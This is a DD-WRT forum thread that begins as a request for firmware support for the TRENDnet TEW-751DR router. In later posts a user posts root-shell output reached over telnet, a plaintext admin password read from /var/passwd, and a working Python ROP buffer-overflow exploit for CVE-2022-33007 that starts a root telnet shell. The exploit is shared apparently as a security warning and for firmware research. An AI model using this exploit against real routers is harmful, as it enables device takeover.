DD-WRT :: View topic - request for Trendnet TEW-751DR

request for Trendnet TEW-751DR

DD-WRT Forum Index -> Ralink SoC based Hardware

View previous topic :: View next topic

Author

Message

forcefedflesh
DD-WRT Novice

Joined: 28 Aug 2015
Posts: 8

Posted: Fri Aug 28, 2015 22:58 Post subject: request for Trendnet TEW-751DR

So I thought id put in a request for this cheap powerful router some people are getting free and under $20 like I did for $10

I wanted to use this as a wireless bridge but trendnet has no future in getting it support said.

https://wikidevi.wi-cat.ru/TRENDnet_TEW-751DR_(unreleased)

why I thought this should be here since other setups similar are supported by dd-wrt, but this is not.

It seriously would be so good as a cheap budget wifi bridge if any admins or something can help me out getting this to do so, that would be great cause I think I read about 300 people this week in general trying to get dd-wrt and what not on it, but nothing is supported yet it seems as that is what they intended to use it for.

Sponsor

Smash1022
DD-WRT Novice

Joined: 06 May 2012
Posts: 8
Location: USA

Posted: Sat Aug 29, 2015 0:56 Post subject: Newegg special
newegg just sold tons of these for $9.99 each. Ya their a little old, but still quite powerful devices. I would also like to see a DD-WRT version for it.

forcefedflesh
DD-WRT Novice

Joined: 28 Aug 2015
Posts: 8

Posted: Sat Aug 29, 2015 0:58 Post subject: Re: Newegg special

Smash1022 wrote:

newegg just sold tons of these for $9.99 each. Ya their a little old, but still quite powerful devices. I would also like to see a DD-WRT version for it.

FREAKING EXACTLY! Idk how I would go about contacting DD-WRT specifically for this, but I think we needed a darn post atleast...

NotRealName
DD-WRT Novice

Joined: 30 Oct 2025
Posts: 4

Posted: Thu Oct 30, 2025 19:57 Post subject:

root exploit via open telnet service port.

The Telnet service on port 23 has been detected as active.
https://gist.github.com/XiaoCurry/204680035c1efffa27d14956820ad928

Reported by: Chen Xiao(2235254941 ATT qq.com) & Wang Jincheng(wjcwinmt ATT gmail.com)

Affected products: TRENDnet TEW-752DRU Routers
TRENDnet TEW-751DR Router ALSO

https://cvefeed.io/vuln/detail/CVE-2022-33007

Code:

python3 trendnet-751dr-exploit.py
Trying 192.168.17.1...
Connected to 192.168.17.1.
Escape character is '^]'.

BusyBox v1.14.1 (2015-11-02 14:02:52 CST) built-in shell (msh)
Enter 'help' for a list of built-in commands.

# cat /proc/cpuinfo
system type : Ralink SoC
processor : 0
cpu model : MIPS 24Kc V5.0
BogoMIPS : 386.04
wait instruction : yes
microsecond timers : yes
tlb_entries : 32
extra interrupt vector : yes
hardware watchpoint : yes, count: 4, address/irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb]
ASEs implemented : mips16 dsp
shadow register sets : 1
core : 0
VCED exceptions : not available
VCEI exceptions : not available

# top
Mem: 35572K used, 25524K free, 0K shrd, 5032K buff, 14172K cached
CPU: 18% usr 81% sys 0% nic 0% idle 0% io 0% irq 0% sirq
Load average: 1.01 1.05 1.30 2/55 28801
PID PPID USER STAT VSZ %MEM %CPU COMMAND
3868 1 0 R 1516 2% 99% httpd -f /var/run/httpd.conf
1008 1 0 S 696 1% 0% /bin/sh /etc/scripts/cpuload.sh
356 27756 0 R 604 1% 0% top
2465 1 0 S 852 1% 0% updatewifistats -s /etc/scripts/upwif
363 1 0 S 2220 4% 0% xmldb -n wrgnd24_trendnet_tew751dr -t
2508 1 0 S 1476 2% 0% hostapd /var/topology.conf
3216 1 0 S 1220 2% 0% mDNSResponderPosix -b -i br0 -e tew-7
2648 1 0 S 1012 2% 0% udhcpd /var/servd/LAN-1-udhcpd.conf
2830 1 0 S 1012 2% 0% udhcpd /var/servd/LAN-2-udhcpd.conf
21262 1 0 S 1008 2% 0% proxyd -m 1.33.203.39 -f /var/run/pro
776 1 0 S 996 2% 0% /var/run/fakedns --port=63481 --addre
1781 1 0 S 988 2% 0% udhcpc -i eth2.2 -H tew-751drs -p /va
21369 1 0 S 984 2% 0% dnsmasq -C /var/servd/DNS.conf
27744 3868 0 S 972 2% 0% /htdocs/upnp/docs/LAN-1/gena.cgi
3826 1 0 S 960 2% 0% lld2d -c /var/lld2d.conf br0 ra0
364 1 0 S 904 1% 0% servd -d schedule_off
27748 27747 0 S 876 1% 0% telnetd -l /bin/sh
960 1 0 S 872 1% 0% ddnsd
855 1 0 S 860 1% 0% arpmonitor -i br0
515 1 0 S 852 1% 0% gpiod -w 0

Reported by: 　　　FeiXincheng && WangJincheng from X1cT34m
Affected products: TRENDnet TEW751DR <= v1.03 , TRENDnet TEW-752DRU <= v1.03
https://github.com/fxc233/iot-vul/blob/main/TRENDnet/TEW751/bufferoverflow.md

plaintext admin password readable at /var/passwd

Code:

# cat /var/passwd
"admin" "@DSgfhjdf@dd12" "0"

# cat /proc/uptime
100653.93 6.71
# cat /proc/
/proc/1/ /proc/30505/ /proc/irq/
/proc/1008/ /proc/31032/ /proc/kallsyms
/proc/101/ /proc/3216/ /proc/kcore
/proc/1016/ /proc/356/ /proc/kmsg
/proc/106/ /proc/363/ /proc/loadavg
/proc/107/ /proc/364/ /proc/locks
/proc/108/ /proc/3826/ /proc/meminfo
/proc/109/ /proc/3868/ /proc/misc
/proc/1090/ /proc/3892/ /proc/modules
/proc/1781/ /proc/4/ /proc/mounts
/proc/2/ /proc/5/ /proc/mt7620/
/proc/20019/ /proc/515/ /proc/mtd
/proc/20388/ /proc/71/ /proc/net/
/proc/20734/ /proc/73/ /proc/nf_conntrack_flush
/proc/21121/ /proc/75/ /proc/pagetypeinfo
/proc/21262/ /proc/776/ /proc/partitions
/proc/21369/ /proc/8/ /proc/pptp/
/proc/2140/ /proc/855/ /proc/pthrough/
/proc/2141/ /proc/90/ /proc/rt3052/
/proc/2158/ /proc/960/ /proc/sche/
/proc/21759/ /proc/alpha/ /proc/scsi/
/proc/22858/ /proc/buddyinfo /proc/self/
/proc/23032/ /proc/bus/ /proc/softirqs
/proc/23435/ /proc/cmdline /proc/stat
/proc/23633/ /proc/cpuinfo /proc/sys/
/proc/2465/ /proc/crypto /proc/system_reset
/proc/2508/ /proc/devices /proc/timer_list
/proc/2581/ /proc/diskstats /proc/tty/
/proc/2648/ /proc/driver/ /proc/uptime
/proc/27744/ /proc/execdomains /proc/version
/proc/27747/ /proc/filesystems /proc/vmallocinfo
/proc/27748/ /proc/fs/ /proc/vmstat
/proc/2830/ /proc/interrupts /proc/zoneinfo
/proc/286/ /proc/iomem
/proc/3/ /proc/ioports
# cat /proc/loadavg
1.20 1.09 1.02 2/56 31124
# cat /proc/meminfo
MemTotal: 61096 kB
MemFree: 25364 kB
Buffers: 5032 kB
Cached: 14172 kB
SwapCached: 0 kB
Active: 12792 kB
Inactive: 10524 kB
Active(anon): 4112 kB
Inactive(anon): 0 kB
Active(file): 8680 kB
Inactive(file): 10524 kB
Unevictable: 0 kB
Mlocked: 0 kB
SwapTotal: 0 kB
SwapFree: 0 kB
Dirty: 0 kB
Writeback: 0 kB
AnonPages: 4132 kB
Mapped: 1876 kB
Shmem: 0 kB
Slab: 6712 kB
SReclaimable: 1320 kB
SUnreclaim: 5392 kB
KernelStack: 448 kB
PageTables: 412 kB
NFS_Unstable: 0 kB
Bounce: 0 kB
WritebackTmp: 0 kB
CommitLimit: 30548 kB
Committed_AS: 8316 kB
VmallocTotal: 1048372 kB
VmallocUsed: 4596 kB
VmallocChunk: 1013240 kB
# cat /proc/version
Linux version 2.6.33.2 (release@cdWSCMPL05) (gcc version 4.3.3 (GCC) ) #1 Mon Nov 2 14:02:48 CST 2015

CVE-2022-33007
TRENDnet Wi-Fi Routers Buffer Overflow Vulnerability
Base CVSS Score: 8.8
https://nvd.nist.gov/vuln/detail/CVE-2022-33007

EXTREME RISK! DO NOT USE THIS ROUTER UNTIL FIRMWARE IS FIXED.

kernel-panic69
DD-WRT Guru

Joined: 08 May 2018
Posts: 16813
Location: Texas, USA

Posted: Thu Oct 30, 2025 21:45 Post subject:

Nobody ever replied with this router never seeing DD-WRT support because:

Quote:

CPU1: Realtek RTL8198

https://wiki.dd-wrt.com/wiki/index.php/Known_incompatible_devices

Quote:

it is based on a Realtek chipset

But there is a conflict of information given the information above, obviously... or rather, there are two TEW-751DR models:

https://wikidevi.wi-cat.ru/TRENDnet_TEW-751DR_V1.0R

No hardware donation signs anywhere in the usual spots, so this thing will probably never see support without one.

NotRealName
DD-WRT Novice

Joined: 30 Oct 2025
Posts: 4

Posted: Fri Oct 31, 2025 18:38 Post subject: serial console pins found on circuitboard

TRENDnet..TEW-751DR..CVE-2022-33007..telnet.root.exploit--EDITED4610.jpg

Description:

TRENDnet TEW-751DR CVE-2022-33007 telnet root exploit

Filesize:

2.55 MB

Viewed:

4387 Time(s)

TRENDnet..TEW-751DR..CVE-2022-33007..telnet.root.exploit--EDITED4610.jpg

NotRealName
DD-WRT Novice

Joined: 30 Oct 2025
Posts: 4

Posted: Wed Nov 05, 2025 16:15 Post subject:

Code:

# cat /proc/mt
/proc/mt7620/ /proc/mtd
# cat /proc/mtd
dev: size erasesize name
mtd0: 00800000 00010000 "raspi"
mtd1: 004e9000 00010000 "rootfs"
mtd2: 00790000 00010000 "upgrade"
mtd3: 00010000 00010000 "devconf"
mtd4: 00010000 00010000 "devdata"
mtd5: 00020000 00010000 "langpack"
mtd6: 00800000 00010000 "flash"
mtd7: 00030000 00010000 "u-boot"
mtd8: 00008000 00010000 "boot env"

is there any other information you need/want?

Code:

# python3
from pwn import *
from socket import *
from os import *
from time import *
context(os = 'linux', arch = 'mips')

libc_base = 0x2aaf8000

s = socket(AF_INET, SOCK_STREAM)

cmd = b'telnetd -l /bin/sh;'
payload = b'a'*462
payload += p32(libc_base + 0x53200 - 1) # s0 system_addr - 1
payload += p32(libc_base + 0x169C4) # s1 addiu $s2, $sp, 0x18 (=> jalr $s0)
payload += b'a'*4 # s2
payload += p32(libc_base + 0x32A98) # ra addiu $s0, 1 (=> jalr $s1)
payload += b'a'*0x18 # padding
payload += cmd

msg = b"UNSUBSCRIBE /gena.cgi?service=" + payload + b" HTTP/1.1\r\n"
msg += b"Host: localhost:49152\r\n"
msg += b"SID: 1\r\n\r\n"

s.connect((gethostbyname("192.168.17.1"), 49152))
s.send(msg)

sleep(1)
system("telnet 192.168.17.1 23")

https://web.archive.org/web/20251105162959/https://github.com/fxc233/iot-vul/blob/main/TRENDnet/TEW751/bufferoverflow.md

kernel-panic69
DD-WRT Guru

Joined: 08 May 2018
Posts: 16813
Location: Texas, USA

Posted: Wed Nov 05, 2025 16:54 Post subject:

I'm doubtful that the developer is interested in porting now antique hardware that he doesn't have in hand to test.
_________________
"Life is but a fleeting moment, a vapor that vanishes quickly; All is vanity"
Contribute To DD-WRT
Pogo - A minimal level of ability is expected and needed...
RSS feed for DD-WRT releases (2025)
RSS feed for DD-WRT releases (2024)
RSS feed for DD-WRT releases (2023)
----------------------
Linux User #377467 counter.li.org / linuxcounter.net

Display posts from previous:

Page 1 of 1

DD-WRT Forum Index -> Ralink SoC based Hardware

All times are GMT

Navigation

Jump to:

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You cannot download files in this forum

Log in

request for Trendnet TEW-751DR

Quick Links

Log in